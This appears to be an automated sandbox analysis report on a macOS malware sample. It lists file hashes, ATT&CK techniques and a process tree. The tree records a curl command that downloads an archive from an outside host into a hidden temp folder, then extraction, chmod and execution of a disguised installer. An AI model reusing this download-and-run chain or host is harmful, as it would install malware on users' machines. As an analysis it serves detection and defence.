Analysis

  • max time kernel
    7s
  • max time network
    106s
  • platform
    macos-10.15_amd64
  • resource
    macos-20241101-en
  • resource tags

    arch:amd64arch:i386image:macos-20241101-enkernel:19b77alocale:en-usos:macos-10.15-amd64system
  • submitted
    17/02/2025, 18:06

General

  • Target

    Macos-Malware-Samples-main/0941ef4c37d983720934aae64b03511d5707f7e77d4ed7f9d31cfd8e8ecba061

  • Size

    48KB

  • MD5

    ecd1f29667a6087e752fe16b1b776494

  • SHA1

    e85686e7f9038228efc3fc55c4d39edf5f82506a

  • SHA256

    0941ef4c37d983720934aae64b03511d5707f7e77d4ed7f9d31cfd8e8ecba061

  • SHA512

    1e6bb4daf0dc8962fd9bf8775bbbba75c802e0a90bd0b6b8f4f73fb410e2389d07f78ede3ffaeaca9a31ff5f4a1653ce18168c4d572c4ec55e03dda51ea315c7

  • SSDEEP

    768:PtnLm/quXoMJWz1tO1JgcJyjf7KcflZyU1v7oVy89hrO8r3mJc:PPMc1tO1JBJyjGcfFky8rmJ

Malware Config

Signatures

  • Exfiltration Over Alternative Protocol 1 TTPs 1 IoCs

    Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.

  • File Permission 1 TTPs

    Adversaries may modify file permissions/attributes to evade access control lists (ACLs) and access protected files.

  • Resource Forking 1 TTPs 1 IoCs

    Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.

  • Command and Scripting Interpreter 1 TTPs

    Adversaries may abuse Unix shell commands and scripts for execution.

Processes

  • /bin/sh
    sh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/0941ef4c37d983720934aae64b03511d5707f7e77d4ed7f9d31cfd8e8ecba061\""
    1⤵
      PID:502
    • /bin/bash
      sh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/0941ef4c37d983720934aae64b03511d5707f7e77d4ed7f9d31cfd8e8ecba061\""
      1⤵
        PID:502
      • /usr/bin/sudo
        sudo /bin/zsh -c /Users/run/Macos-Malware-Samples-main/0941ef4c37d983720934aae64b03511d5707f7e77d4ed7f9d31cfd8e8ecba061
        1⤵
          PID:502
          • /bin/zsh
            /bin/zsh -c /Users/run/Macos-Malware-Samples-main/0941ef4c37d983720934aae64b03511d5707f7e77d4ed7f9d31cfd8e8ecba061
            2⤵
              PID:503
            • /Users/run/Macos-Malware-Samples-main/0941ef4c37d983720934aae64b03511d5707f7e77d4ed7f9d31cfd8e8ecba061
              /Users/run/Macos-Malware-Samples-main/0941ef4c37d983720934aae64b03511d5707f7e77d4ed7f9d31cfd8e8ecba061
              2⤵
                PID:503
                • /usr/bin/python
                  /usr/bin/python -
                  3⤵
                    PID:504
                  • /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
                    /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python -
                    3⤵
                      PID:504
                      • /usr/bin/curl
                        /usr/bin/curl -qsL -m 1200 "http://bghui.storeyourstreams.xyz/tr/ioffers.tar.gz?ts=1739844745" -o /private/tmp/.mmstmp//stmp.tar.gz
                        4⤵
                          PID:505
                  • /usr/libexec/xpcproxy
                    xpcproxy com.apple.sysmond
                    1⤵
                      PID:506
                    • /usr/libexec/sysmond
                      /usr/libexec/sysmond
                      1⤵
                        PID:506
                      • /bin/sh
                        sh -c "/usr/bin/tar -xvzf /private/tmp/.mmstmp//stmp.tar.gz -C /private/tmp/.mmstmp/"
                        1⤵
                          PID:507
                        • /bin/bash
                          sh -c "/usr/bin/tar -xvzf /private/tmp/.mmstmp//stmp.tar.gz -C /private/tmp/.mmstmp/"
                          1⤵
                            PID:507
                          • /usr/bin/tar
                            /usr/bin/tar -xvzf /private/tmp/.mmstmp//stmp.tar.gz -C /private/tmp/.mmstmp/
                            1⤵
                              PID:507
                            • /bin/sh
                              sh -c "/bin/chmod +x '/private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos'"
                              1⤵
                                PID:508
                              • /bin/bash
                                sh -c "/bin/chmod +x '/private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos'"
                                1⤵
                                  PID:508
                                • /bin/chmod
                                  /bin/chmod +x /private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos
                                  1⤵
                                    PID:508
                                  • /bin/sh
                                    sh -c "'/private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos'"
                                    1⤵
                                      PID:509
                                    • /bin/bash
                                      sh -c "'/private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos'"
                                      1⤵
                                        PID:509
                                      • /private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos
                                        /private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos
                                        1⤵
                                          PID:509

                                        Network

                                        MITRE ATT&CK Enterprise v15

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads